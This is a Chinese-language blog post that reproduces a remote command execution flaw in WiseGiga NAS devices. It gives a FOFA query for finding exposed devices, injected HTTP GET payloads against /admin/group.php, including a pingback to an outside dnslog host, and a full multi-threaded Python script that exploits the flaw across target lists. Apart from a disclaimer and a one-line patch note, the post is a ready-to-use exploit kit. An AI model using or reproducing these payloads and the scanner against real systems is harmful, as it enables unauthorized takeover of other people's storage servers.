文章目录
- WiseGiga NAS RCE漏洞复现 [附POC]
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响版本
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
- 0x06 修复建议
WiseGiga NAS RCE漏洞复现 [附POC]
0x01 前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
0x02 漏洞描述
新韩进出口有限公司是一家销售NAS产品的韩国公司。WiseGiga NAS是一种韩国的“网络存储器”,它是一种专用的数据存储服务器。WiseGiga NAS 系统group.php存在任意命令执行漏洞,攻击者可以通过执行任意命令,获取服务器管理权限。
0x03 影响版本
WiseGiga NAS
0x04 漏洞环境
FOFA语法: app=“WISEGIGA-NAS”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (GET)
GET /admin/group.php?memberid=root&cmd=add&group_name=d;id>group.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
PS:(此远程命令执行是无回显的)
3.复现
执行ping命以及利用dnslog
GET /admin/group.php?memberid=root&cmd=add&group_name=d;ping+fyfkauyqub.dgrh3.cn HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
1.发送写入文件的数据包
2.访问写入的文件进行RCE
GET /admin/group.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
自动化脚本
(地址:https://github.com/VulnExpo/ExploitHunter/blob/main/WiseGigaNAS_rce_exploit.py)
#coding=UTF-8
import requests
import argparse
import threading
import httplib2
import random
import re
import string
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def check_for_vulnerability(url, proxies=None, success_file=None):
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
}
paths = ['/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt', '/admin/1.txt']
for path in paths:
target_url = url + path
response = requests.get(target_url, headers=headers, timeout=10, verify=False)
if response.status_code == 200 and "window.open" in response.text:
response2 = requests.get(url + paths[1], headers=headers, timeout=10, verify=False)
if response2.status_code == 200 and "uid=" in response2.text:
print(f"目标URL: {url}")
with open(success_file, 'a') as s_file:
s_file.write(f"++++++++++++++++++\n")
s_file.write(f"目标URL: {url}\n")
s_file.write(f"响应内容: {response2.text}\n\n")
return True
except Exception as e:
print(f"发生异常:{e}")
return False
def scan_targets(targets, proxies=None, success_file=None):
for target in targets:
target = target.strip()
check_for_vulnerability(target, proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
threads = []
for i in range(num_threads):
thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="WiseGiga NAS远程命令执行漏洞")
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
args = parser.parse_args()
if not args.url and not args.file:
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
exit(1)
if args.url:
urls = [args.url]
elif args.file:
with open(args.file, 'r') as file:
urls = file.readlines()
success_file = 'success_targets.txt'
proxies = {
"http": args.proxy,
"https": args.proxy
} if args.proxy else None
multi_threaded_scan(urls, proxies, success_file, args.threads)
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
0x06 修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
http://www.wisegiga.com/
